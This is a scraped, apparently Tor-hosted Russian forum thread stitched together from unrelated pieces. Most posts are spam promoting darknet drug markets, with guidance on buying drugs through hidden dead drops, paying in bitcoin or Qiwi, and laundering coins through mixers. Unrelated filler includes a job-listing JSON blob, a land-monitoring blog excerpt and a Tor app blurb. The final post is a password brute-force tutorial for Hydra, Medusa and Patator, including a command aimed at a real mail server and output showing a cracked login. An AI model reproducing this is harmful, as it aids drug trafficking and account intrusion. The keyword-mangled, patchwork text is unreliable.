Длинная ссылка на рамп в тор

Yguzyv

Администратор
Подтвержденный
Сообщения
486
Реакции
37
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



Nerac

Юзер
Сообщения
110
Реакции
9
Длинная ссылка на рамп в тор
Рабочие зеркала помогают зайти на сайт omg onion через обычный браузер в зеркало обход запретов и блокировки.omg onion ссылка на даркнет магазин в тор.
соль телеграмм. продать аккаунт гидры. купить закладку гашиш. магазины ск в телеграмме. продам шишки бошки. какой на вкус кокс. цена героина в европе. 1 грамм кокса сколько это доз.ОМГ обход блокировкиТор ОМГ ссылкаЗайти на omgВход на ГидруОМГ онион ссылка на моментальные магазины в торЗакладки с наркотиками повсюду, в телеге, в tor, в центр веб.Спам который вы так ждали: мефедрон, кокс, спайс, герыч, марихуана, чистейший кокаин — все доступно на официальном сайте маркета omg.омг нарко этокак зайти на гидру без тор браузеракак зайти на гидру с компьютераomg wiki ссылкакак зайти на гидру с компьютераomg не работаеткакая ссылка на гидру?админ гидрыомг шишкиомг мусорскаяомг нарко этокакая ссылка на гидру?не заходит на гидруОМГ сайт как зайтиМурманск, Минск, Томск, Волгоград, Первоуральск, Нижний Новгород, Саратов, Соликамск, Воронеж, Киев, Владимир, Саратов, Астана, вся РФ.Магазин ОМГ omg — криптомаркет нового поколения.ОМГ ТORговая площадкаСсылки omgomg Onion (магазин ОМГ онион) — уникальная торговая площадка в сети ТОР. Криптомаркет работает на всей территории РФ, Беларусии, Украины, Казахстана функционирует 24 часа в сутки, без выходных, постоянная онлайн-поддержка, гарант, автоматизированные продажи с опалтой через киви или биткоин.ОМГ полностью безопасна и написана на современных языках программирования.Основная проблема при регистрации на гидре - это поиск правильной ссылки. Кроме онион ссылки, есть ссылка на зеркала без тора.Преимущества сайта криптомаркета заключаются в том, что:omg — самый удобный и безопасный магазин для покупок товара;Интернет-магазин самый популярный в РФ, СНГ и за границей. Есть несущественных различий, в сравнении с другими сайтами, благодаря которым покупатели всегда выбирают только Гидру;Отсутствует критичные уязвимости в кибербезопасности (по заявлению администрации omg центр);Вы можете создать собственный bitcoin кошелек, через обменник биткоина (киви в биткоин);Сайт обладает лучшей системой анонимности. За все время работы сайта не было утечек личных данных пользователей сайта.Безостановочно возникают новые инструменты, позволяющие работать в сети анонимно.В следствии чего возникли онион сайты (ссылки, существующие в домен-зоне onion).Из полезных новинок:покупки можно совершать мгновенно;не нужно ждать подтверждения транзакции в блокчейне;пополнить баланс теперь матангу можно даже через Сбербанк.пополнить баланс теперь можно даже через Сбербанк.покупки можно совершать моментально;оплата в битках и киви;Для перемешивания лайткоинов применяйте миксеры криптовалютыblender mixerКак уже было сказано, ОМГ – крупнейший центр торговли в deep web. В этом маркетплейсе есть возможность купить то, что в открытом доступе приобрести достаточно сложно или невозможно. Каждый зарегистрированный покупатель может зайти в любой из имеющихся на сервисе магазинов и купить нелегальный товар, организовав его поставку в города России и страны СНГ. Преобритение товара возможна в любое время суток из любого региона. Особое преимущество данной площадки это регулярное обновление ассортимента магазинов.Выбрать и пробрести товар услугу не составит труда. Перед покупкой можно ознакомиться с отзывами предыдущих покупателей. Поэтому пользователь сайта может заранее оценить качество покупки и решить, нужен ему товар или все же от этой покупки стоит отказаться. Приемущество анонимного интернет-криптомаркета в наличии службы контрольных закупок. Они следят за тем, чтобы товары, которые представлены в магазинах соответствовали заявленным требованиям и даже проводят в некоторых случаях химический анализ продаваемых веществ. Если по каким-то причинам выявляется несоответствие качеству товара, товар немедленно снимают с продажи, магазин закрывают, продавец блокируется.Доставку вещества можно заказать в любой регион России и СНГ, указав адрес, где будет удобно забрать прикоп. Покупка передается в виде прикопа. После того, как покупатель подтвердит наход товара, удостоверится в качестве продукта продавец получает свои деньги. Если с качеством или доставкой в момент покупки возникли проблемы, покупатель имеет право инициировать спор, к которому сразу же подключатся независимые модераторы Гидры. Оплата веществ производится в биткоинах, и в большинстве случаев продавцы предпочитают принимать оплату биткоинами. Однако некоторые магазины готовы принять оплату рублями через КИВИ кошелек. Сами админы портала советуют производить оплату криптой, так как это самый безопасный способ оплаты, который также позволяет сохранить приватность проводимых сделок.Что такое ТОР и зачем он необходимTOR — это технология, которая позволяет скрыть личность пользователя в сети интернет. Расшифровывается TOR как The Onion Router — луковый маршрутизатор.TOR изначально был военным проектом США, но в скором времени его открыли для спонсоров, и теперь он называется Tor Project. Основная идея этой технологии — обеспечение анонимности и безопасности в интернете, где большинство участников не доверяют друг другу. Смысл этой частной сети в том, что данные проходят через несколько компьютеров, шифруются, у них меняется IP и вы получаете защищённый канал передачи данных.Что обязательно необходимо учитывать при работе с ОМГ сайтом?От некачественных сделок с моментальными магазинами при посещении сайта не застрахован ни один покупатель.В связи с этим администраторы портала советуют:смотреть на отзывы. Мнение покупателей это важнейший критерий покупки. Мнения могут повлиять на окончательное решение о покупке товара или вещества. Благодаря оставленным комментариям можно узнать о качестве товара, способах доставки и других деталях сотрудничества с магазином;подтверждать покупку только после того, как будет подтверждено ее качество. Если возникли проблемы, а подтверждение уже сделано, в этом случае деньги не получится вернуть;оставлять отзывы после покупок. Это поможет другим покупателям сделать правильный выбор и не ошибиться при выборе товара;придумывать абсолютно новые пароли и логины для каждого пользователя перед регистрацией. Главное, чтобы пароли и логины, не были ранее задействованные на других ресурсах. Это позволит следовать принципам анонимности;Обратите внимание, что регулярно домен Гидры обновляется ее создателями. Дело в том, что сайт практически каждый день блокируют, и пользователю в результате не удается зайти на площадку, не зная рабочих ссылок. Чтобы избежать подобной проблемы, администрация портала советует добавить официальную страницу Гидры в закладки. Сохрани себе все ссылки на сайт и делись ими со своими товарищами.Потенциальный закладчик должен зарегистрироваться для того, чтобы пользоваться всеми возможностями Гидры.Когда система одобрит регистрацию клиента, он получит доступ к правилам пользования площадки. Также сразу после регистрации он получит возможность пополнить баланс личного кабинета, чтобы тут же приступить к покупкам.Пополнение баланса на сайте ОМГ заслуживает отдельного внимания. Дело в том, что для поплнения кошелька стандартной валюты площадки – BTC – требуется вначале купить фиат, который сразу нужно будет обменять на крипту. Купить его можно либо на криптовалютной бирже, либо в специальном обменнике.Когда фиат будет куплен и обменен на определенное количество биткоинов, останется перевести деньги в системе. Чтобы это сделать, нужно скопировать адрес кошелька, который был выдан при регистрации, и отправить на него нужную сумму посредством использования различных платежных систем (например, Киви в биткоин). Также обмен на биткоин может быть реализован на самой площадке в специальном разделе «обмен».Как не потерять деньги на сайте мошенниковДля защиты от обманных сайтов, была придумана сеть бесперебойных зеркал.Чтобы не попасть на фейковые сайты сохраните ссылку зеркала на этот сайт в закладки. Скопируйте все рабочие зеркала с этого сайта к себе на компьютер так как Роскомнадзор может заблокировать сайт.
 

Myjif

Юзер
Сообщения
37
Реакции
22
ОМГ ссылка зеркало рабочее на сегодня торMizoxyЗа годы работы проекта, он достиг статуса монополиста. ОМГ. В мнениях, которые те оставили в карточке товара, можно найти массу интересных деталей о конкретном предложении продавца. Раздел «обмен» есть на самой Гидре. Например, за рубли. При возникновении проблем с качеством…
Длинная ссылка на рамп в тор
 

Okahurov

Юзер
Сообщения
96
Реакции
4
{"job_short_counter":2309,"atts":{"featured_only":"yes","job_alerts":"no","job_filters":"no","job_top_search":"no","job_sort_by":"no","job_excerpt":"10","job_pagination":"no","job_per_page":"4","job_cat":"","job_view":"view-default","job_order":"DESC","job_orderby":"date","job_type":"","job_filters_loc":"yes","job_filters_date":"yes","job_filters_type":"yes","job_filters_sector":"yes","job_custom_fields_switch":"no","job_elem_custom_fields":"","job_deadline_switch":"no","quick_apply_job":"no","job_loc_listing":"country,city"},"content":"","job_map_counter":74889592,"page_id":152,"page_url":"https:\/\/hrsprovider.com\/","custom_fields":[]}{"posts_per_page":"4","paged":"","post_type":"job","post_status":"publish","order":"DESC","orderby":"meta_value_num","meta_key":"jobsearch_field_job_publish_date","fields":"ids","meta_query":[[{"relation":"OR","0":{"key":"jobsearch_field_job_filled","compare":"NOT EXISTS"},"1":[{"key":"jobsearch_field_job_filled","value":"on","compare":"!="}]},{"key":"jobsearch_job_employer_status","value":"approved","compare":"="},{"key":"jobsearch_field_job_featured","value":"on","compare":"="}]],"post__in":[0]}
 
Z

Zamec

Юзер
Сообщения
57
Реакции
19
Managing and Monitoring Landscapes Protecting and improving land health requires comprehensive landscape management strategies. Land managers have embraced a landscape-scale philosophy and have developed new methods to inform decision making such as satellite imagery to assess current conditions and detect changes, and predictive models to forecast change. The Landscape Toolbox is a coordinated system of tools and methods for implementing land health monitoring and integrating monitoring data into management decision-making.The goal of the Landscape Toolbox is to provide the tools, resources, and training to land health monitoring methods and technologies for answering land management questions at different scales.Nelson Stauffer Uncategorized 0The core methods described in the Monitoring Manual for Grassland, Shrubland, and Savanna Ecosystems are intended for multiple use. Each method collects data that can be used to calculate multiple indicators and those indicators have broad applicability. Two of the vegetative methods, canopy gap and vegetation height, have direct application…Continue readingNelson Stauffer Uncategorized 0Quality Assurance (QA) and Quality Control (QC) are both critical to data quality in ecological research and both are often misunderstood or underutilized. QA is a set of proactive processes and procedures which prevent errors from entering a data set, e.g., training, written data collection protocols, standardized data entry formats,…Continue readingNelson Stauffer Uncategorized 0In order to meet its monitoring and information needs, the Bureau of Land Management is making use of its Assessment, Inventory, and Monitoring strategy (AIM). While taking advantage of the tools and approaches available on the Landscape Toolbox, there are additional implementation requirements concerning the particulars of sample design, data…Continue readingNelson Stauffer Methods Guide, Monitoring Manual, Training 0We’ve added two new videos demonstrating and explaining the Core Methods of Plant species inventory and Vegetation height to our collection. These are two methods that previously didn’t have reference videos, although the rules and procedures for both can be found in volume I of the Monitoring Manual for Grassland, Shrubland,…Continue readingSarah McCord Methods Guide, Monitoring Manual, Training 0Question: Are succulents counted as a woody species when measuring vegetation heights? Answer: Yes. Succulent plant species are considered to be woody in contrast to herbaceous because their function is more similar to woody vegetation than herbaceous vegetation in many applications of these data. From a wildlife viewpoint: Some succulents are…Continue readingNelson Stauffer Blog, News, Presentations 0The 68th annual Society for Range Management meeting held in the first week of February 2015 in Sacramento, California was a success for the Bureau of Land Management’s Assessment, Inventory, and Monitoring (AIM) strategy. Staff from the BLM’s National Operations Center and the USDA-ARS Jornada hosted a day-long symposium to…Continue readingJason Karl Blog, Sample Design sample design, sampling 0What is an Inference Space? Inference space can be defined in many ways, but can be generally described as the limits to how broadly a particular results applies (Lorenzen and Anderson 1993, Wills et al. in prep.). Inference space is analogous to the sampling universe or the population. All these…Continue readingNelson Stauffer Blog, Monitoring Tools & Databases, News 0A new version of the Database for Inventory, Monitoring, and Assessment has just been released! This latest iteration—as always—aims to improve stability and reliability for field data collection on a tablet and data report generation in the office. For more information about DIMA and how it fits into project designs,…Continue readingJason Karl Blog, News 0In compiling information for the redesign of the Landscape Toolbox website and the second edition of the Monitoring Manual, I kept referring back to a small set of seminal references. These are my “Go-To” books and papers for designing and implementing assessment, inventory, and monitoring programs and for measuring vegetation…Continue readingJason Karl Blog, News 0We’re excited to show off the new redesign of the Landscape Toolbox. We’re in the middle of not only refreshing the website, but also completely overhauling the content and how it’s organized in the Toolbox. This version of the Toolbox is draft at this point and is evolving rapidly. Take…Continue reading
 

Nuzujato

Юзер
Сообщения
87
Реакции
6
Red Onion - Tor Browser - это браузерное приложение от zhurong li. Веб-браузер обеспечивает улучшенную конфиденциальность при доступе в интернет на мобильных устройствах. Он туннелирует интернет-соединение через сеть Tor . Эта функция скрывает IP - адрес пользователя, а также просмотр деятельность от интернета - провайдеров и сомнительных беспроводных сетей. Он также позволяет получить доступ к эксклюзивным сайтам Tor Onion с анонимными «скрытыми сервисами» . Пользователи также могут обойти интернет-фильтры и цензоры с приложением. Им присваивается новый IP-адрес , одновременно стирается кеш, файлы cookie и история одним щелчком мыши. Любые cookie-файлы, накопленные в результате просмотра, блокируются. Сценарии и мультимедийное содержимое, которые отслеживают действия, также могут быть отключены.PROSНа основе исходного кода iOS-OnionBrowserИсходный код доступенОбеспечивает анонимный просмотр веб-страницЭксклюзивные сайты OnionCONSСильно зависит от сети анонимизации TorМожет испытывать замедлениеБлокирует медиаплееры и файлыМожет не открываться должным образом в определенных регионах
 

Aheja

Юзер
Сообщения
58
Реакции
14
“Брутфорс (полный перебор, en brute force/Bruteforce, в обиходе просто брут) — метод «грубой силы» или «атака в лоб», перебор паролей, попытка подобрать пароль полным или частичным перебором. Специфика данного метода взлома состоит в том, что он не гарантирует успех подбора правильного пароля, однако процент достижения поставленной цели возрастает от количества паролей которые изначально заданы.  Для этого существует несколько утилит — omg, Medusa, Patator.Что же собой представляет omg, в основе программы лежит модульная структура, поэтому проект с самого начала быстро развивался: количество поддерживаемых протоколов росло как на дрожжах. Сейчас с помощью гидры пароль можно подобрать к более чем 30 протоколам, включая telnet, ftp, http, https, smb, несколькими СУБД.В настоящее время поддерживаются следующие протоколы: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 и v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP.Опции omg : -R восстановить предыдущую прерванную/оборванную сессию -S выполнить SSL соединение -s ПОРТ если служба не на порту по умолчанию, то можно задать порт здесь -l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами), или загрузить несколько логинов из ФАЙЛА -p ПАРОЛЬ или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА -x МИНИМУМ:МАКСИМУМ:НАБОР_СИМВОЛОВ генерация паролей для брутфорса, наберите "-x -h" для помощи -e nsr "n" — пробовать с пустым паролем, "s" — логин в качестве пароля и/или "r" — реверс учётных данных -u зацикливаться на пользователя, а не на парлях (эффективно! подразумевается с использованием опции -x) -C ФАЙЛ формат где "логин:пароль" разделены двоеточиями, вместо опции -L/-P -M ФАЙЛ список серверов для атак, одна запись на строку, после двоеточия ':' можно задать порт -o ФАЙЛ записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода -f / -F выйти, когда пара логин/пароль подобрана (-M: -f для хоста, -F глобально) -t ЗАДАЧИ количество запущенных параллельно ЗАДАЧ (на хост, по умолчанию: 16) -w / -W ВРЕМЯ время ожидания ответов (32 секунды) / между соединениями на поток -4 / -6 предпочитать IPv4 (по умолчанию) или IPv6 адреса -v / -V / -d вербальный режим / показывать логин+пароль для каждой попытки / режим отладки -q не печатать сообщения об ошибках соединения -U подробные сведения об использовании модуля server цель: DNS, IP или 192.168.0.0/24 (эта ИЛИ опция -M) service служба для взлома (смотрите список поддерживаемых протоколов) OPT некоторые модули служб поддерживают дополнительный ввод (-U для справки по модулю)вот не большой наглядный приемчик брут по smtp :Вводим команду:omg -L /home/mironich/login.txt -P /home/mironich/pass.txt smtp.yandex.ru smtp-authважно написать именно smtp-auth а не smtp ибо выдаст ошибку[email protected]:/$ omg -L /home/mironich/login.txt -P /home/mironich/pass.txt smtp.yandex.ru smtp-authomg v8.0.0 (c) 2016 by van Hauser / THC - use allowed only for legal purposes.omg (http://www.thc.org) starting at 2016-12-10 13:58:42[DATA] 16 tasks, 1 servers, 30 login tries (l:6/p:5), ~1 tries per task[DATA] attacking service smtp-auth on port 25Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or passwordError: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or passwordError: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or passwordError: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or passwordError: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or passwordError: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password[STATUS] attack finished for smtp.yandex.ru (waiting for childs to finish)Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password[25][smtpauth] host: 87.250.250.38 login: Hjlt6658 password: HjklopmНебольшой пример брута по словарю, и сбрученая почта аналогично можно поступать с остальными сервисами.Medusa и omg  во многом похожи они модульные и «многопоточные», с хорошо настраиваемыми возможностями. Основное различие в том, как распараллеливается процесс перебора: у Medusa – потоками, у omg – процессами. Что дает первой некое преимущество.Опции Medusa :-h [TARGET] : указываем имя узла или IP адрес для брута-H [FILE] : файл с именами или IP дресами для брута-u [TARGET] : имя пользователя-U [FILE] : файл с именами пользователя-p [TARGET] : пароль -P [FILE] : файл с паролями для перебора-С [FILE] : файл с сотавными записями для перебора формат записи host:user:password ... либо же можно указать PwDump файл (user:id:lm:ntlm:::)-O [FILE] : лог файл для записи информации об успешности/неуспешности попыки-e [n/s/ns] : дополнительные опции при подборе, -n подставлять в качестве пароля пустой пароль, -s имя пользователя-M [TEXT] : выбор модуля(протокола) для пербора-m [TEXT] : параметры для передачи в модуль-d : вывести список модулей-n [NUM] : определяет нестандартный TCP порт-s : использовать SSL-g [NUM] : прекратить попытки соединения после NUM секунд-r [NUM] : задает временной промежуток между попытками-R [NUM] : пробовать NUM раз прежде чем прекратить перебор-t [NUM] : общее количество логинов которое может проверяться одновременно (количество потоков)-T [NUM] : общее количество узлов которое может проверяться одновременно-L : распараллеливание вычисления, использовать по одному имени пользователя на поток-f : прекратить перебор хоста после первого удачного варианта-F : прекратить весь перебор после первого удачного варианта-b : не показывать баннер при запуске-q : показать информацию по используемуму модулю пример medusa -M smbnt -q-v [NUM] : Задает насколько подробен вывод программы NUM=[0-6] -w [NUM] : Задает насколько подробен вывод сообщений об ошибках. NUM=[0..10]-V : вывод версии-z [TEXT] : выводит информации о предыдущем сканированииПример использования$ medusa -dMedusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]> Available modules in "." : Available modules in "/usr/local/lib/medusa/modules" : + cvs.mod : Brute force module for CVS sessions : version 2.0 + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0 + http.mod : Brute force module for HTTP : version 2.0 + imap.mod : Brute force module for IMAP sessions : version 2.0 + mssql.mod : Brute force module for M$-SQL sessions : version 2.0 + mysql.mod : Brute force module for MySQL sessions : version 2.0 + nntp.mod : Brute force module for NNTP sessions : version 2.0 + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0 + pop3.mod : Brute force module for POP3 sessions : version 2.0 + rexec.mod : Brute force module for REXEC sessions : version 2.0 + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0 + rsh.mod : Brute force module for RSH sessions : version 2.0 + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0 + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0 + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0 + snmp.mod : Brute force module for SNMP Community Strings : version 2.0 + ssh.mod : Brute force module for SSH v2 sessions : version 2.0 + telnet.mod : Brute force module for telnet sessions : version 2.0 + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0 + vnc.mod : Brute force module for VNC sessions : version 2.0 + web-form.mod : Brute force module for web forms : version 2.0 + wrapper.mod : Generic Wrapper Module : version 2.0 $ medusa -M pop3 -qMedusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>pop3.mod (2.0) JoMo-Kun <[email protected]> :: Brute force module for POP3 sessionsAvailable module options: MODE:? (NORMAL, AS400) [optional] Sets the mode for error detection. AUTH:? (Authentication Type (USER/PLAIN/LOGIN/NTLM). Default: automatic) Module will query service for accepted methods via an "AUTH" request. USER (clear-text), SASL PLAIN, SASL LOGIN, and SASL NTLM authentication methods are supported. DOMAIN:? [optional] AUTH USER - Appends domain to username (e.g. [email protected]). AUTH NTLM - Supplies specified domain during NTLM authentication. The default behaviour is to use the server supplied domain value. Usage example: "medusa -M pop3 -m MODE:AS400 -U accounts.txt -p password" "medusa -M pop3 -m DOMAIN:foo.com -U accounts.txt -p password"medusa -M pop3 -h mail.example.com -u admin -P ~/password.txt -O ~/brut.log -w 10 -v 6 -F -t 100Брутфорс узла mail.example.com по протоколу pop3 (входящая почта), пользователь admin, словарь паролей лежит в домашнем каталоге в файле password.txt, записывать результат в файл иrut.log, максимальный уровень вывода и отладки, перебирать в сто потоков.Что же касается Patator-а он меня меня привлек возможностью очень хитро настраивать фильтрацию определенных ответов от серверов (это нельзя делать ни в omg, ни в Medusa). Например, они будут пропускать легитимный логин/пароль, если ответ будет 400, 402, 405, 406 и так далее. Это связанно с тем, что реализация != RFC. A в patator все это можно легко настроить. При этом мы все так же можем указывать необходимые словари и куда их необходимо вставлять. А из интересных фич можно выделить: показ прогресса выполнения и возможность поставить перебор на паузу.Модули Patator:ftp_login : Брут-форс FTPssh_login : Брут-форс SSHtelnet_login : Брут-форс Telnetsmtp_login : Брут-форс SMTPsmtp_vrfy : Перечисление валидных пользователей с использованием SMTP VRFYsmtp_rcpt : Перечисление валидных пользователей с использованием SMTP RCPT TOfinger_lookup : Перечисление валидных пользователей с использованием Fingerhttp_fuzz : Брут-форс HTTPpop_login : Брут-форс POP3pop_passd : Брут-форс poppassd (http://netwinsite.com/poppassd/)imap_login : Брут-форс IMAP4ldap_login : Брут-форс LDAPsmb_login : Брут-форс SMBsmb_lookupsid : Брут-форс SMB SID-lookuprlogin_login : Брут-форс rloginvmauthd_login : Брут-форс демона аутентификации VMwaremssql_login : Брут-форс MSSQLoracle_login : Брут-форс Oraclemysql_login : Брут-форс MySQLmysql_query : Брут-форс запросов MySQLrdp_login : Брут-форс RDP (NLA)pgsql_login : Брут-форс PostgreSQLvnc_login : Брут-форс VNCdns_forward : Прямой поиск DNSdns_reverse : Обратный поиск DNSsnmp_login : Брут-форс SNMP v1/2/3ike_enum : Перечисление преобразований IKEunzip_pass : Брутфорс паролей зашифрованных файлов ZIPkeystore_pass : Брутфорс паролей файлов хранилища ключей Javaumbraco_crack : Взлом хешей паролей Umbraco HMAC-SHA1tcp_fuzz : Фаззинг TCP службdummy_test : Модуль тестированияПример использования на ZIP file:unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0 10:54:29 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 10:54:29 PMT10:54:29 patator INFO - 10:54:29 patator INFO - code size | candidate | num | mesg10:54:29 patator INFO - ----------------------------------------------------------------------10:54:30 patator INFO - 0 82 | love | 387 | 0 [82] No errors detected in compressed data of challenge1.zip.^C10:54:31 patator INFO - Hits/Done/Skip/Fail/Size: 1/1589/0/0/5000, Avg: 699 r/s, Time: 0h 0m 2s10:54:31 patator INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154сам patator можно найти тут : https://github.com/lanjelot/patator
 

Похожие темы

Сверху Снизу